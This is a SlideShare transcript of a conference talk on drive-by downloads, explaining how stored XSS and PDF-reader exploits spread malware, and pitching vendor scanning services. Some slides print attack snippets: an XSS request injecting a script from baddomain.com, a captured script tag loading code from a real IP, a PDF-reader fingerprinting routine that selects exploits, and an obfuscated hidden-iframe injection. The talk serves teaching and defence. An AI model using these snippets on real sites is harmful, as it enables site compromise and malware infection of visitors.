SlideShare a Scribd company logo
Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App Lars Ewe, CenzicNeil Daswani, Dasient Session ID: xxx-xxxxSession Classification: xxxxxxxxxxxx
Drive-By via XSS on RSA Conf WebsiteDiscovered by Gerry Eisenhaur (Dasient)Persistent XSS in Jive“Benign” drive-by injected / Pops up calc.exeScript element embedded in a “tag” at:https://365.rsaconference.com/people/gerrye?view=bookmarksUn-escaped tag (and benign drive-by) rendered athttps://365.rsaconference.com/view-profile-favorites-list.jspa?targetUser=18102Yet again -- use of SSL alone does not provide security – code must be made secure also!
Check This Out …Watch
AgendaQuick History of Security Malware Anatomy & DistributionLifecycle of Malware ProtectionFuture of Web Security
5Quick History:  Security
Evolution of Security 1980s  Anti-Virus1986: Brain Virus (Pakistan)  1990: More viruses – Fish, Flip, Whale.   1991-98: Famous Michelangelo. Symantec introduces Norton1998 – 2004:  Internet surge, new viruses =  (Melissa, I love you, Nimda, SQL Slammer, Sobig.F, Naachi, Sasser) cause havoc Over 60K known viruses. Frequent updates provided by vendors.1990s Network SecurityLate 90s – With the Explosion of Internet, network firewalls control traffic
 Intrusion Detection Systems (IDS) introduced to monitor anomalous activity
 Intrusion Prevention Systems (IPS) combined IDS & network firewalls
Network vulnerability scanning tools introduced to aid vulnerability management 2000s Application SecurityLate 90s:  Internet growth, companies tighten the perimeter but ignore applications
Some vulnerability scanning  tools & WAFs deployed, but security holes remain – especially for custom apps
Drive-by-downloads mature from prototype attacks to mainstream
2007: SQL Injection used to inject malicious drive-by-download code in addition to data theft
2009: Gumblar web worm infects 80K servers, Web malware used in Aurora attack, widget attacks
2010:  Over 1M web sites infected in 1 quarter, large Gov websites hit (NIH, US Treasury, EPA)Fundamental Change in Malware DistributionInfect clientsInfect servers to infect clientsLate 80s to 90sLate 90s to mid-2000sMid-2000s to presentDistribution methodsFloppy Disks,WormsEmail attachments, file downloadsDrive-by-downloads (at legitimate sites)Active content on web pagesExecutable code in static fileForm of malwarePC, OS, client-side appsWeb applicationsand serversWhat’s exploitedWebsites suffer brand, revenue, and customer losses when infected
8Malware Anatomy & Distribution
Step 1: Infect a Site (or 2 or 3 or Thousands!)There is no perimeterWeb 2.0/ external contentSoftware vulnerabilitiesAds (Malvertising) Mash-ups Widgets External images User generated content (HTML, images, links, exe, documents)SQL Injection
XSS
 PHP file include
 Un-patched Software (blog, CMS, shopping cart)Infrastructure vulnerabilitiesPasswords compromisedVulnerable hosting platform
Network vulnerabilities
FTP credentials
SSH credentials
Web server credentialsStep 1.  Infect via Stored XSSHttp request to inject script:Server’s response contains:http://www.mywwwservice.com/update_profile?Favorite_food=cookies+%3Cscript src=baddomain.com%3E%3C/script%3E<p>Your favorite food is 'cookies <script src=baddomain.com></script>' returned the following results:</p>
Step 1: Inject Really Malicious JavaScript
Step 1: Inject Really Malicious JavaScript
Step 1: Inject Really Malicious JavaScriptSources in malicious JavaScript from a compromised IP!Infects user's machine silently<script id=_0_ src=//218.93.202.61/cp/></script>
Step 2: Invoke Client-Side VulnerabilityCVE-2008-2992Description: Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104CVE-2007-5659Description: Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods.CVE-2009-0927Description: Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object.
Step 2: Ex. Fingerprint PDF ReaderJavaScript generates a zero-size IFRAME in web page sources in a PDF file PDF file has JavaScript that fingerprints the version of the PDF reader (Note: JavaScript interpreter used by PDF reader is different  than JavaScript interpreter used by browser)Attacker needs to determine which version of  the PDF reader / JavaScript interpreter to target
Step 2: Ex. Fingerprint PDF Readerfunction pdf_start(){var version=app.viewerVersion.toString();version=version.replace(/\D/g,'');varversion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));if((version_array[0]==8)&&(version_array[1]==0)||(version_array[1]==1&&version_array[2]DA3)){util_printf();} if((version_array[0]DA8)||(version_array[0]==8&&version_array[1]DA2&&version_array[2]DA2)){collab_email();} if((version_array[0]DA9)||(version_array[0]==9&&version_array[1]DA1)){collab_geticon();}} pdf_start();}
Step 3: Deliver ShellcodeDepending upon version of Adobe PDF Reader / JavaScript interpreter, send appropriate shellcode“Spray” the heap with assembly instructions that give shell accessCall a PDF reader helper function that jumps to shellcode on the heap (e.g., collab_email())
Step 4: Send ‘Downloader’Example: 2k8.exe
Step 5: Join a Botnet: e.g. Zeus
Zeus Botnet + Targeted PhishingBotnet propagation + Targeted Phishing:http://internetbanking.gad.de/banking/http://hsbc.co.ukhttp://www.mybank.alliance-leicester.co.ukhttp://www.citibank.de
What Next?Steal credentials (e.g., Zeus)Sell fake anti-virus (e.g., Koobface)Steal FTP credentials (e.g., Gumblar)Steal corporate secrets (e.g., Aurora)Collect fraudulent click revenue (e.g., ClickbotA)

More Related Content

PPTX
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
PDF
Web Security: A Primer for Developers
PPT
Starwest 2008
PDF
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
PPT
Web browser privacy and security
PDF
The Hidden XSS - Attacking the Desktop & Mobile Platforms
PDF
Top Ten Web Hacking Techniques (2008)
PPT
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
Web Security: A Primer for Developers
Starwest 2008
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
Web browser privacy and security
The Hidden XSS - Attacking the Desktop & Mobile Platforms
Top Ten Web Hacking Techniques (2008)

What's hot (20)

PPTX
Top Ten Web Hacking Techniques of 2012
PPT
Phishing with Super Bait
PPT
Web Application Security: The Land that Information Security Forgot
PPTX
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
DOCX
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
PPT
Browser Security
PPT
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
PPTX
Website hacking and prevention (All Tools,Topics & Technique )
PDF
AbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
PDF
Web Security - Introduction v.1.3
PPT
Top Ten Web Hacking Techniques – 2008
PDF
Attack Chaining: Advanced Maneuvers for Hack Fu
PPT
Hacking A Web Site And Secure Web Server Techniques Used
PDF
Abusing, Exploiting and Pwning with Firefox Add-ons
PPTX
Phu appsec13
ODP
Csrf not-all-defenses-are-created-equal
PPT
Intro to Web Application Security
PDF
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
PPTX
CBSE class X Computer Applications ch 1 INTERNET
PDF
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Top Ten Web Hacking Techniques of 2012
Phishing with Super Bait
Web Application Security: The Land that Information Security Forgot
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
Browser Security
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Website hacking and prevention (All Tools,Topics & Technique )
AbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
Web Security - Introduction v.1.3
Top Ten Web Hacking Techniques – 2008
Attack Chaining: Advanced Maneuvers for Hack Fu
Hacking A Web Site And Secure Web Server Techniques Used
Abusing, Exploiting and Pwning with Firefox Add-ons
Phu appsec13
Csrf not-all-defenses-are-created-equal
Intro to Web Application Security
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
CBSE class X Computer Applications ch 1 INTERNET
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Ad

Viewers also liked (8)

PPT
Administración básica1
PPS
Cádiz al natural
PPTX
Skrivaförwebben
PPTX
Teorias de proyectos web
DOC
I N F O R M E D E Exposición De Tecnologia
DOC
Inbjudan andreas carlgren
PDF
Ola 13
PDF
Session 31 Jan-Erik Swärdh
Administración básica1
Cádiz al natural
Skrivaförwebben
Teorias de proyectos web
I N F O R M E D E Exposición De Tecnologia
Inbjudan andreas carlgren
Ola 13
Session 31 Jan-Erik Swärdh
Ad

Similar to Drive By Downloads: How To Avoid Getting a Cap Popped in Your App (20)

PPT
Renaud Bido & Mohammad Shams - Hijacking web servers & clients
PDF
TRISC 2010 - Grapevine , Texas
PDF
Scaling Web 2.0 Malware Infection
PPTX
Two-For-One Talk: Malware Analysis for Everyone
PPTX
Men in the Server Meet the Man in the Browser
PPT
Trends in network security feinstein - informatica64
PPTX
Drive by downloads-cns
PDF
Battling Malware In The Enterprise
PDF
How to Stop Man in the Browser Attacks
PPTX
Surfing with Sharks KS ED TECH 2012
PPT
Web Application Testing for Today’s Biggest and Emerging Threats
PDF
Ransomware Trends 2017 & Mitigation Techniques
PDF
Apt presso good to learn
PDF
Modern malware and threats
PDF
Owning bad guys {and mafia} with javascript botnets
PDF
Toorcon Seattle 2011 - Browser Exploit Packs
PPT
Malware Analysis Made Simple
PPTX
ITSolutions|Currie Network Security Seminar
PPT
PDF
Operation Buhtrap - AVAR 2015
Renaud Bido & Mohammad Shams - Hijacking web servers & clients
TRISC 2010 - Grapevine , Texas
Scaling Web 2.0 Malware Infection
Two-For-One Talk: Malware Analysis for Everyone
Men in the Server Meet the Man in the Browser
Trends in network security feinstein - informatica64
Drive by downloads-cns
Battling Malware In The Enterprise
How to Stop Man in the Browser Attacks
Surfing with Sharks KS ED TECH 2012
Web Application Testing for Today’s Biggest and Emerging Threats
Ransomware Trends 2017 & Mitigation Techniques
Apt presso good to learn
Modern malware and threats
Owning bad guys {and mafia} with javascript botnets
Toorcon Seattle 2011 - Browser Exploit Packs
Malware Analysis Made Simple
ITSolutions|Currie Network Security Seminar
Operation Buhtrap - AVAR 2015

More from Cenzic (8)

PDF
Continuous Monitoring for Web Application Security
PDF
How to Overcome the 5 Barriers to Production App Security Testing
PDF
Essentials of Web Application Security: what it is, why it matters and how to...
PDF
Ians cenzic webinar
PDF
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
PDF
Security in the cloud protecting your cloud apps
PDF
HARM Score: Approaches to Quantitative Risk Analysis for Web Applications
PDF
AJAX: How to Divert Threats
Continuous Monitoring for Web Application Security
How to Overcome the 5 Barriers to Production App Security Testing
Essentials of Web Application Security: what it is, why it matters and how to...
Ians cenzic webinar
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Security in the cloud protecting your cloud apps
HARM Score: Approaches to Quantitative Risk Analysis for Web Applications
AJAX: How to Divert Threats

Recently uploaded (20)

PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PDF
NewMind AI Weekly Chronicles - August'25 Week I
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
PDF
Chapter 3 Spatial Domain Image Processing.pdf
PDF
Encapsulation theory and applications.pdf
PDF
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
PPTX
Big Data Technologies - Introduction.pptx
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
PDF
Encapsulation_ Review paper, used for researhc scholars
PDF
KodekX | Application Modernization Development
PPTX
MYSQL Presentation for SQL database connectivity
PDF
MIND Revenue Release Quarter 2 2025 Press Release
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
PDF
cuic standard and advanced reporting.pdf
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
PPT
Teaching material agriculture food technology
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
NewMind AI Weekly Chronicles - August'25 Week I
Building Integrated photovoltaic BIPV_UPV.pdf
Chapter 3 Spatial Domain Image Processing.pdf
Encapsulation theory and applications.pdf
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Big Data Technologies - Introduction.pptx
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Encapsulation_ Review paper, used for researhc scholars
KodekX | Application Modernization Development
MYSQL Presentation for SQL database connectivity
MIND Revenue Release Quarter 2 2025 Press Release
“AI and Expert System Decision Support & Business Intelligence Systems”
cuic standard and advanced reporting.pdf
Diabetes mellitus diagnosis method based random forest with bat algorithm
Teaching material agriculture food technology
Per capita expenditure prediction using model stacking based on satellite ima...
Digital-Transformation-Roadmap-for-Companies.pptx
Build a system with the filesystem maintained by OSTree @ COSCUP 2025

Drive By Downloads: How To Avoid Getting a Cap Popped in Your App

  • 1. Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Lars Ewe, CenzicNeil Daswani, Dasient Session ID: xxx-xxxxSession Classification: xxxxxxxxxxxx
  • 2. Drive-By via XSS on RSA Conf WebsiteDiscovered by Gerry Eisenhaur (Dasient)Persistent XSS in Jive“Benign” drive-by injected / Pops up calc.exeScript element embedded in a “tag” at:https://365.rsaconference.com/people/gerrye?view=bookmarksUn-escaped tag (and benign drive-by) rendered athttps://365.rsaconference.com/view-profile-favorites-list.jspa?targetUser=18102Yet again -- use of SSL alone does not provide security – code must be made secure also!
  • 3. Check This Out …Watch
  • 4. AgendaQuick History of Security Malware Anatomy & DistributionLifecycle of Malware ProtectionFuture of Web Security
  • 5. 5Quick History: Security
  • 6. Evolution of Security 1980s Anti-Virus1986: Brain Virus (Pakistan) 1990: More viruses – Fish, Flip, Whale. 1991-98: Famous Michelangelo. Symantec introduces Norton1998 – 2004: Internet surge, new viruses = (Melissa, I love you, Nimda, SQL Slammer, Sobig.F, Naachi, Sasser) cause havoc Over 60K known viruses. Frequent updates provided by vendors.1990s Network SecurityLate 90s – With the Explosion of Internet, network firewalls control traffic
  • 7. Intrusion Detection Systems (IDS) introduced to monitor anomalous activity
  • 8. Intrusion Prevention Systems (IPS) combined IDS & network firewalls
  • 9. Network vulnerability scanning tools introduced to aid vulnerability management 2000s Application SecurityLate 90s: Internet growth, companies tighten the perimeter but ignore applications
  • 10. Some vulnerability scanning tools & WAFs deployed, but security holes remain – especially for custom apps
  • 11. Drive-by-downloads mature from prototype attacks to mainstream
  • 12. 2007: SQL Injection used to inject malicious drive-by-download code in addition to data theft
  • 13. 2009: Gumblar web worm infects 80K servers, Web malware used in Aurora attack, widget attacks
  • 14. 2010: Over 1M web sites infected in 1 quarter, large Gov websites hit (NIH, US Treasury, EPA)Fundamental Change in Malware DistributionInfect clientsInfect servers to infect clientsLate 80s to 90sLate 90s to mid-2000sMid-2000s to presentDistribution methodsFloppy Disks,WormsEmail attachments, file downloadsDrive-by-downloads (at legitimate sites)Active content on web pagesExecutable code in static fileForm of malwarePC, OS, client-side appsWeb applicationsand serversWhat’s exploitedWebsites suffer brand, revenue, and customer losses when infected
  • 15. 8Malware Anatomy & Distribution
  • 16. Step 1: Infect a Site (or 2 or 3 or Thousands!)There is no perimeterWeb 2.0/ external contentSoftware vulnerabilitiesAds (Malvertising) Mash-ups Widgets External images User generated content (HTML, images, links, exe, documents)SQL Injection
  • 17. XSS
  • 18. PHP file include
  • 19. Un-patched Software (blog, CMS, shopping cart)Infrastructure vulnerabilitiesPasswords compromisedVulnerable hosting platform
  • 23. Web server credentialsStep 1. Infect via Stored XSSHttp request to inject script:Server’s response contains:http://www.mywwwservice.com/update_profile?Favorite_food=cookies+%3Cscript src=baddomain.com%3E%3C/script%3E<p>Your favorite food is 'cookies <script src=baddomain.com></script>' returned the following results:</p>
  • 24. Step 1: Inject Really Malicious JavaScript
  • 25. Step 1: Inject Really Malicious JavaScript
  • 26. Step 1: Inject Really Malicious JavaScriptSources in malicious JavaScript from a compromised IP!Infects user's machine silently<script id=_0_ src=//218.93.202.61/cp/></script>
  • 27. Step 2: Invoke Client-Side VulnerabilityCVE-2008-2992Description: Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104CVE-2007-5659Description: Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods.CVE-2009-0927Description: Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object.
  • 28. Step 2: Ex. Fingerprint PDF ReaderJavaScript generates a zero-size IFRAME in web page sources in a PDF file PDF file has JavaScript that fingerprints the version of the PDF reader (Note: JavaScript interpreter used by PDF reader is different than JavaScript interpreter used by browser)Attacker needs to determine which version of the PDF reader / JavaScript interpreter to target
  • 29. Step 2: Ex. Fingerprint PDF Readerfunction pdf_start(){var version=app.viewerVersion.toString();version=version.replace(/\D/g,'');varversion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));if((version_array[0]==8)&&(version_array[1]==0)||(version_array[1]==1&&version_array[2]DA3)){util_printf();} if((version_array[0]DA8)||(version_array[0]==8&&version_array[1]DA2&&version_array[2]DA2)){collab_email();} if((version_array[0]DA9)||(version_array[0]==9&&version_array[1]DA1)){collab_geticon();}} pdf_start();}
  • 30. Step 3: Deliver ShellcodeDepending upon version of Adobe PDF Reader / JavaScript interpreter, send appropriate shellcode“Spray” the heap with assembly instructions that give shell accessCall a PDF reader helper function that jumps to shellcode on the heap (e.g., collab_email())
  • 31. Step 4: Send ‘Downloader’Example: 2k8.exe
  • 32. Step 5: Join a Botnet: e.g. Zeus
  • 33. Zeus Botnet + Targeted PhishingBotnet propagation + Targeted Phishing:http://internetbanking.gad.de/banking/http://hsbc.co.ukhttp://www.mybank.alliance-leicester.co.ukhttp://www.citibank.de
  • 34. What Next?Steal credentials (e.g., Zeus)Sell fake anti-virus (e.g., Koobface)Steal FTP credentials (e.g., Gumblar)Steal corporate secrets (e.g., Aurora)Collect fraudulent click revenue (e.g., ClickbotA)
  • 35. Evolution: Multi-DOM Node Injection<div id=f37z>*!@g$a+\*t*e##4a+@d^s!.i!n$f+o@@</div><script>document.write('<iframe src=\''+unescape(document.getElementById('f37z').innerHTML.replace(/[\+!*^#@$]/g,""))+'\' width=0 height=0></iframe>');
  • 36. Evolution: Multi-DOM Node Injection<div id=f37z>*!@g$a+\*t*e##4a+@d^s!.i!n$f+o@@</div><iframesrc=gate4ads.info width=0 height=0></iframe><script>document.write('<iframe src=\''+unescape(document.getElementById('f37z').innerHTML.replace(/[\+!*^#@$]/g,""))+'\' width=0 height=0></iframe>');
  • 38. Infection Library: Example Entry
  • 40. Defense-In-Depth:Lifecycle of Malware ProtectionAssessVulnerability & Malware Risk AssessmentSecurity Design Review, Secure Coding Practices, Fix Bugs, WAF, Code ReviewsPreventDetectWeb Anti-Malware (WAM) MonitoringContainmod_antimalwareRecoverRemove malcode
  • 41. 28Future of Web Security
  • 42. Risk ToleranceMission Critical SecurityOn-premise softwareImportant SecurityManaged ServiceIntegrated Web Scanning / Malware Cloud Solution (Cenzic / Dasient)Broad offering
  • 45. Manage Website Risk: Fast & EasyTestAllApps For HealthCheckLowRISKSCOREStrong Testing for Important AppsRobust Testing for Critical AppsHigh
  • 46. Takeaways: What You Should Do Within 3 MonthsTest ALL your web applications via a HealthCheck Test for both application vulnerabilities and malwarePrioritize your vulnerabilities based on risk scoreBlock until you remediateGet Feb 2011 Ponemon research report on the state of web application security
  • 47. Integrated HealthCheck Offer & Learn MoreGet a Free, Integrated Website HealthCheck!Get a listing of all website vulnerabilities in an easy to read report!Just email: appmal@cenzic.comFor more information on Web vulnerability scanning and malware, visit us!
  • 49. www.cenzic.com / http://blog.cenzic.com
  • 52. 34Thank You!Lars Ewe, CenzicNeil Daswani, Dasient

Editor's Notes

  • #10: Use web application vulnerability (stored XSS) to inject legitimate web page with malicious code (e.g., JavaScript, IFRAME, etc)Invoke client-side vulnerability (e.g., IE zero-day, PDF exploit, etc) OR use social engineeringDeliver shellcode to take controlSend “downloader”Deliver malware of attackers choice